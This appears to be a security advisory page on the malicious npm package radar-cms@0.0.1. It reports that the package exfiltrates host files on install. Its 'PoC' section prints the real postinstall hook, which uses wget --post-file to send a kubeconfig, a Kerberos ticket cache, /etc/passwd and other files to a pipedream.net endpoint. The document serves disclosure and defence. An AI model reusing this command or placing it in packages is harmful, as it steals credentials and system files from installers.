radar-cms@0.0.1-security vulnerabilities

security holding package

Direct Vulnerabilities

Known vulnerabilities in the radar-cms package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free
VulnerabilityVulnerable Version
  • C
Malicious Package

radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine.

PoC

"postinstall": "wget --post-file ~/.kube/config https://entfet95itcxpuu.m.pipedream.net;wget 
--post-file package.json https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/passwd 
https://entfet95itcxpuu.m.pipedream.net;wget --post-file /tmp/krb5cc_0
 https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/hosts 
https://entfet95itcxpuu.m.pipedream.net"

How to fix Malicious Package?

Avoid using all malicious instances of the radar-cms package.

*